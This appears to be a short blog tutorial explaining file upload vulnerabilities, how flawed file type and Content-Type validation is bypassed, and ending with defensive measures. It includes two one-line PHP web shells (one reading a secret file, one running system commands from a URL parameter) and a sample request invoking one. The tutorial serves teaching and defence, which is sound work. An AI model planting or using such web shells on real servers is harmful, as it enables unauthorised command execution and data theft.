File Upload Vulnerabilities

golam_mostafa

Golam_Mostafa

Posted on November 23, 2024

File Upload Vulnerabilities

What Are File Upload Vulnerabilities?

File upload vulnerabilities occur when a server lets users upload files without proper checks. Attackers can exploit this to upload harmful files, like scripts, instead of safe ones, like images. Sometimes, just uploading the file causes damage; other times, attackers trigger the file to execute with a request.


How Do These Vulnerabilities Happen?

Even when protections exist, flaws in implementation can still allow attacks. Common issues include:

  • Blocking some dangerous file types but missing others.
  • Relying on file properties that attackers can fake using tools.
  • Inconsistent validation across the website.

These small mistakes give attackers ways to bypass security measures.


Exploiting Flawed File Upload Validation

Attackers often exploit weak validation to upload harmful scripts, like web shells. For example, a PHP script like this reads secret files:

<?php echo file_get_contents('secret.txt'); ?>
Enter fullscreen mode Exit fullscreen mode

Or, a script like this can run system commands:

<?php echo system($_GET['cmd']); ?>
Enter fullscreen mode Exit fullscreen mode

Attackers can send:

GET /hack.php?cmd=whoami
Enter fullscreen mode Exit fullscreen mode

This shows the server's identity and gives attackers control.


Flawed File Type Validation

Some servers validate file uploads by checking the Content-Type header for expected MIME types like image/jpeg. However, if the server trusts this header without checking the fileโ€™s actual contents, attackers can easily bypass the validation.

For example, an image upload form may send this request:

POST /images HTTP/1.1  
Host: example.com  
Content-Type: multipart/form-data  

--boundary  
Content-Disposition: form-data; name="image"; filename="example.jpg"  
Content-Type: image/jpeg  

[binary data]  
--boundary--
Enter fullscreen mode Exit fullscreen mode

If the server only verifies the Content-Type value, attackers can fake this using tools like Burp Repeater and upload malicious files disguised as images.


Protecting Against File Upload Vulnerabilities

To prevent these attacks:

  1. Verify file content matches the declared type.
  2. Store uploaded files in non-executable directories.
  3. Use strict whitelists for allowed file types.
  4. Scan files for malicious content.

Learn More: Watch the Tutorial

Acknowledgment: This post is inspired by insights from PortSwigger Web Security and ChatGPT.

๐Ÿ’– ๐Ÿ’ช ๐Ÿ™… ๐Ÿšฉ
golam_mostafa
Golam_Mostafa

Posted on November 23, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

ยฉ TheLazy.dev

About